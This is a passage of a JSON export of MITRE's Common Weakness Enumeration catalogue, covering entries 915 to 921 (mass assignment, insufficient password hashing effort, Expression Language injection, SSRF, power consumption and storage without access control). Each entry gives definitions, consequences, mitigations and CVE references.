incorrect.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0649"},{"Reference":"CVE-2006-6661","Description":"extract() enables static code injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6661"},{"Reference":"CVE-2006-2828","Description":"import_request_variables() buried in include files makes post-disclosure analysis confusing","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2828"},{"Reference":"CVE-2009-0422","Description":"Chain: Dynamic variable evaluation allows resultant remote file inclusion and path traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0422"},{"Reference":"CVE-2007-2431","Description":"Chain: dynamic variable evaluation in PHP program used to modify critical, unexpected $_SERVER variable for resultant XSS.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2431"},{"Reference":"CVE-2006-4904","Description":"Chain: dynamic variable evaluation in PHP program used to conduct remote file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4904"},{"Reference":"CVE-2006-4019","Description":"Dynamic variable evaluation in mail program allows reading and modifying attachments and preferences of other users.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4019"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-01-26"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}]}},"915":{"attr":{"@_ID":"915","@_Name":"Improperly Controlled Modification of Dynamically-Determined Object Attributes","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component that specifies multiple attributes, properties, or fields that are to be initialized or updated in an object, but it does not properly control which attributes can be modified.","Extended_Description":{"xhtml:p":["If the object contains attributes that were only intended for internal use, then their unexpected modification could lead to a vulnerability.","This weakness is sometimes known by the language-specific mechanisms that make it possible, such as mass assignment, autobinding, or object injection."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"913","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"502","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Ruby","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"ASP.NET","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Python","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":[{"Term":"Mass Assignment","Description":"\\"Mass assignment\\" is the name of a feature in Ruby on Rails that allows simultaneous modification of multiple object attributes."},{"Term":"AutoBinding","Description":"The \\"Autobinding\\" term is used in frameworks such as Spring MVC and ASP.NET MVC."},{"Term":"PHP Object Injection","Description":"Some PHP application researchers use this term for attacking unsafe use of the unserialize() function, but it is also used for CWE-502."}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Application Data","Note":"An attacker could modify sensitive data or program variables."},{"Scope":"Integrity","Impact":"Execute Unauthorized Code or Commands"},{"Scope":["Other","Integrity"],"Impact":["Varies by Context","Alter Execution Logic"]}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":{"xhtml:p":["If available, use features of the language or framework that allow specification of allowlists of attributes or fields that are allowed to be modified. If possible, prefer allowlists over denylists.","For applications written with Ruby on Rails, use the attr_accessible (allowlist) or attr_protected (denylist) macros in each class that may be used in mass assignment."]}},{"Phase":["Architecture and Design","Implementation"],"Description":"If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified."},{"Phase":"Implementation","Strategy":"Input Validation","Description":"For any externally-influenced input, check the input against an allowlist of internal object attributes or fields that are allowed to be modified."},{"Phase":["Implementation","Architecture and Design"],"Strategy":"Refactoring","Description":"Refactor the code so that object attributes or fields do not need to be dynamically identified, and only expose getter/setter functionality for the intended attributes."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2012-2054","Description":"Mass assignment allows modification of arbitrary attributes using modified URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2054"},{"Reference":"CVE-2012-2055","Description":"Source version control product allows modification of trusted key using mass assignment.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2055"},{"Reference":"CVE-2008-7310","Description":"Attackers can bypass payment step in e-commerce software.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7310"},{"Reference":"CVE-2013-1465","Description":"Use of PHP unserialize function on untrusted input allows attacker to modify application configuration.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1465"},{"Reference":"CVE-2012-3527","Description":"Use of PHP unserialize function on untrusted input in content management system might allow code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3527"},{"Reference":"CVE-2012-0911","Description":"Use of PHP unserialize function on untrusted input in content management system allows code execution using a crafted cookie value.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0911"},{"Reference":"CVE-2012-0911","Description":"Content management system written in PHP allows unserialize of arbitrary objects, possibly allowing code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0911"},{"Reference":"CVE-2011-4962","Description":"Content management system written in PHP allows code execution through page comments.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4962"},{"Reference":"CVE-2009-4137","Description":"Use of PHP unserialize function on cookie value allows remote code execution or upload of arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4137"},{"Reference":"CVE-2007-5741","Description":"Content management system written in Python interprets untrusted data as pickles, allowing code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5741"},{"Reference":"CVE-2011-2520","Description":"Python script allows local users to execute code via pickled data.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2520"},{"Reference":"CVE-2005-2875","Description":"Python script allows remote attackers to execute arbitrary code using pickled objects.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2875"},{"Reference":"CVE-2013-0277","Description":"Ruby on Rails allows deserialization of untrusted YAML to execute arbitrary code.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0277"},{"Reference":"CVE-2011-2894","Description":"Spring framework allows deserialization of objects from untrusted sources to execute arbitrary code.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2894"},{"Reference":"CVE-2012-1833","Description":"Grails allows binding of arbitrary parameters to modify arbitrary object properties.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1833"},{"Reference":"CVE-2010-3258","Description":"Incorrect deserialization in web browser allows escaping the sandbox.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3258"},{"Reference":"CVE-2008-1013","Description":"Media library allows deserialization of objects by untrusted Java applets, leading to arbitrary code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1013"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-885"}},{"attr":{"@_External_Reference_ID":"REF-886"}},{"attr":{"@_External_Reference_ID":"REF-887"}},{"attr":{"@_External_Reference_ID":"REF-888"}},{"attr":{"@_External_Reference_ID":"REF-889"}},{"attr":{"@_External_Reference_ID":"REF-890"}},{"attr":{"@_External_Reference_ID":"REF-891"}},{"attr":{"@_External_Reference_ID":"REF-892"}},{"attr":{"@_External_Reference_ID":"REF-893"}},{"attr":{"@_External_Reference_ID":"REF-894"}},{"attr":{"@_External_Reference_ID":"REF-464"}},{"attr":{"@_External_Reference_ID":"REF-466"}}]},"Notes":{"Note":{"#text":"The relationships between CWE-502 and CWE-915 need further exploration. CWE-915 is more narrowly scoped to object modification, and is not necessarily used for deserialization.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-01-26"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Alternate_Terms, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Contribution":{"attr":{"@_Type":"Feedback"},"Contribution_Name":"Dan Amodio, Dave Wichers","Contribution_Organization":"Aspect Security","Contribution_Date":"2013-01-26","Contribution_Comment":"Suggested adding mass assignment, provided references, and clarified relationship with AutoBinding."}}},"916":{"attr":{"@_ID":"916","@_Name":"Use of Password Hash With Insufficient Computational Effort","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software generates a hash for a password, but it uses a scheme that does not provide a sufficient level of computational effort that would make password cracking attacks infeasible or expensive.","Extended_Description":{"xhtml:p":["Many password storage mechanisms compute a hash and store the hash, instead of storing the original password in plaintext. In this design, authentication involves accepting an incoming password, computing its hash, and comparing it to the stored hash.","Many hash algorithms are designed to execute quickly with minimal overhead, even cryptographic hashes. However, this efficiency is a problem for password storage, because it can reduce an attacker\'s workload for brute-force password cracking. If an attacker can obtain the hashes through some other method (such as SQL injection on a database that stores hashes), then the attacker can store the hashes offline and use various techniques to crack the passwords by computing hashes efficiently. Without a built-in workload, modern attacks can compute large numbers of hashes, or even exhaust the entire space of all possible passwords, within a very short amount of time, using massively-parallel computing (such as cloud computing) and GPU, ASIC, or FPGA hardware. In such a scenario, an efficient hash algorithm helps the attacker.","There are several properties of a hash scheme that are relevant to its strength against an offline, massively-parallel attack:","Note that the security requirements for the software may vary depending on the environment and the value of the passwords. Different schemes might not provide all of these properties, yet may still provide sufficient security for the environment. Conversely, a solution might be very strong in preserving one property, which still being very weak for an attack against another property, or it might not be able to significantly reduce the efficiency of a massively-parallel attack."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["The amount of CPU time required to compute the hash (\\"stretching\\")","The amount of memory required to compute the hash (\\"memory-hard\\" operations)","Including a random value, along with the password, as input to the hash computation (\\"salting\\")","Given a hash, there is no known way of determining an input (e.g., a password) that produces this hash value, other than by guessing possible inputs (\\"one-way\\" hashing)","Relative to the number of all possible hashes that can be generated by the scheme, there is a low likelihood of producing the same hash for multiple different inputs (\\"collision resistance\\")"]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"327","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"327","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"If an attacker can gain access to the hashes, then the lack of sufficient computational effort will make it easier to conduct brute force attacks using techniques such as rainbow tables, or specialized hardware such as GPUs, which can be much faster than general-purpose CPUs for computing hashes."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Configuration Checker"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-51"},"Phase":"Architecture and Design","Description":{"xhtml:p":["Use an adaptive hash function that can be configured to change the amount of computational effort needed to compute the hash, such as the number of iterations (\\"stretching\\") or the amount of memory required. Some hash functions perform salting automatically. These functions can significantly increase the overhead for a brute force attack compared to intentionally-fast functions such as MD5. For example, rainbow table attacks can become infeasible due to the high computing overhead. Finally, since computing power gets faster and cheaper over time, the technique can be reconfigured to increase the workload without forcing an entire replacement of the algorithm in use.","Some hash functions that have one or more of these desired properties include bcrypt [REF-291], scrypt [REF-292], and PBKDF2 [REF-293]. While there is active debate about which of these is the most effective, they are all stronger than using salts with hash functions with very little computing overhead.","Note that using these functions can have an impact on performance, so they require special consideration to avoid denial-of-service attacks. However, their configurability provides finer control over how much CPU and memory is used, so it could be adjusted to suit the environment\'s needs."]},"Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-25"},"Phase":["Implementation","Architecture and Design"],"Description":"When using industry-approved techniques, use them correctly. Don\'t cut corners by skipping resource-intensive steps (CWE-325). These steps are often essential for preventing common attacks."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-1526","Description":"Router does not use a salt with a hash, making it easier to crack passwords.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1526"},{"Reference":"CVE-2006-1058","Description":"Router does not use a salt with a hash, making it easier to crack passwords.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1058"},{"Reference":"CVE-2008-4905","Description":"Blogging software uses a hard-coded salt when calculating a password hash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4905"},{"Reference":"CVE-2002-1657","Description":"Database server uses the username for a salt when encrypting passwords, simplifying brute force attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1657"},{"Reference":"CVE-2001-0967","Description":"Server uses a constant salt when encrypting passwords, simplifying brute force attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0967"},{"Reference":"CVE-2005-0408","Description":"chain: product generates predictable MD5 hashes using a constant value combined with username, allowing authentication bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0408"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"55"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-291"}},{"attr":{"@_External_Reference_ID":"REF-292"}},{"attr":{"@_External_Reference_ID":"REF-293","@_Section":"5.2 PBKDF2"}},{"attr":{"@_External_Reference_ID":"REF-294"}},{"attr":{"@_External_Reference_ID":"REF-295"}},{"attr":{"@_External_Reference_ID":"REF-296"}},{"attr":{"@_External_Reference_ID":"REF-297"}},{"attr":{"@_External_Reference_ID":"REF-298"}},{"attr":{"@_External_Reference_ID":"REF-636"}},{"attr":{"@_External_Reference_ID":"REF-631"}},{"attr":{"@_External_Reference_ID":"REF-632"}},{"attr":{"@_External_Reference_ID":"REF-908"}},{"attr":{"@_External_Reference_ID":"REF-909"}},{"attr":{"@_External_Reference_ID":"REF-633"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-01-28","Submission_Comment":"Created with input from members of the secure password hashing community."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"917":{"attr":{"@_ID":"917","@_Name":"Improper Neutralization of Special Elements used in an Expression Language Statement (\'Expression Language Injection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software constructs all or part of an expression language (EL) statement in a Java Server Page (JSP) using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended EL statement before it is executed.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"EL Injection"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data"},{"Scope":"Integrity","Impact":"Execute Unauthorized Code or Commands"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-911"}},{"attr":{"@_External_Reference_ID":"REF-912"}}]},"Notes":{"Note":{"#text":"In certain versions of Spring 3.0.5 and earlier, there was a vulnerability (CVE-2011-2730) in which Expression Language tags would be evaluated twice, which effectively exposed any application to EL injection. However, even for later versions, this weakness is still possible depending on configuration.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-02-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated References"}],"Contribution":{"attr":{"@_Type":"Feedback"},"Contribution_Name":"Dan Amodio, Dave Wichers","Contribution_Organization":"Aspect Security","Contribution_Date":"2013-02-15","Contribution_Comment":"Suggested adding this weakness and provided references."}}},"918":{"attr":{"@_ID":"918","@_Name":"Server-Side Request Forgery (SSRF)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.","Extended_Description":"By providing URLs to unexpected hosts or ports, attackers can make it appear that the server is sending the request, possibly bypassing access controls such as firewalls that prevent the attackers from accessing the URLs directly. The server can be used as a proxy to conduct port scanning of hosts in internal networks, use other URLs such as that can access documents on the system (using file://), or use other protocols such as gopher:// or tftp://, which may provide greater control over the contents of requests.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"441","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Web Server","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"XSPA","Description":"Cross Site Port Attack"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data"},{"Scope":"Integrity","Impact":"Execute Unauthorized Code or Commands"}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1484","Description":"Web server allows attackers to request a URL from another server, including other ports, which allows proxied scanning.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1484"},{"Reference":"CVE-2004-2061","Description":"CGI script accepts and retrieves incoming URLs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2061"},{"Reference":"CVE-2010-1637","Description":"Web-based mail program allows internal network scanning using a modified POP3 port number.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1637"},{"Reference":"CVE-2009-0037","Description":"URL-downloading library automatically follows redirects to file:// and scp:// URLs","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0037"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"664"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-913"}},{"attr":{"@_External_Reference_ID":"REF-914"}},{"attr":{"@_External_Reference_ID":"REF-915"}},{"attr":{"@_External_Reference_ID":"REF-916"}},{"attr":{"@_External_Reference_ID":"REF-917"}},{"attr":{"@_External_Reference_ID":"REF-918"}},{"attr":{"@_External_Reference_ID":"REF-919"}},{"attr":{"@_External_Reference_ID":"REF-920"}}]},"Notes":{"Note":{"#text":"CWE-918 (SSRF) and CWE-611 (XXE) are closely related, because they both involve web-related technologies and can launch outbound requests to unexpected destinations. However, XXE can be performed client-side, or in other contexts in which the software is not acting directly as a server, so the \\"Server\\" portion of the SSRF acronym does not necessarily apply.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-02-17"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships"}]}},"920":{"attr":{"@_ID":"920","@_Name":"Improper Restriction of Power Consumption","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software operates in an environment in which power is a limited resource that cannot be automatically replenished, but the software does not properly restrict the amount of power that its operation consumes.","Extended_Description":{"xhtml:p":["In environments such as embedded or mobile devices, power can be a limited resource such as a battery, which cannot be automatically replenished by the software itself, and the device might not always be directly attached to a reliable power source. If the software uses too much power too quickly, then this could cause the device (and subsequently, the software) to stop functioning until power is restored, or increase the financial burden on the device owner because of increased power costs.","Normal operation of an application will consume power. However, in some cases, an attacker could cause the application to consume more power than intended, using components such as:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Display","CPU","Disk I/O","GPS","Sound","Microphone","USB interface"]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"400","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"400","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Resource Consumption (Other)","DoS: Crash, Exit, or Restart"],"Note":"The power source could be drained, causing the application - and the entire device - to cease functioning."}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-06-11"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}]}},"921":{"attr":{"@_ID":"921","@_Name":"Storage of Sensitive Data in a Mechanism without Access Control","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software stores sensitive information in a file system or device that does not have built-in access control.","Extended_Description":{"xhtml:p":["While many modern file systems or devices utilize some form of access control in order to restrict access to data, not all storage mechanisms have this capability. For example, memory cards, floppy disks, CDs, and USB devices are typically made accessible to any user within the system. This can become a problem when sensitive data is stored in these mechanisms in a multi-user environment, because anybody on the system can read or write this data.","On Android devices, external storage is typically globally readable and writable by other applications on the device. External storage may also be easily accessible through the mobile device\'s USB connection or physically accessible through the device\'s memory card port."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"922","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Application Data","Read Files or Directories"],"Note":"Attackers can read sensitive information by accessing the unrestricted storage 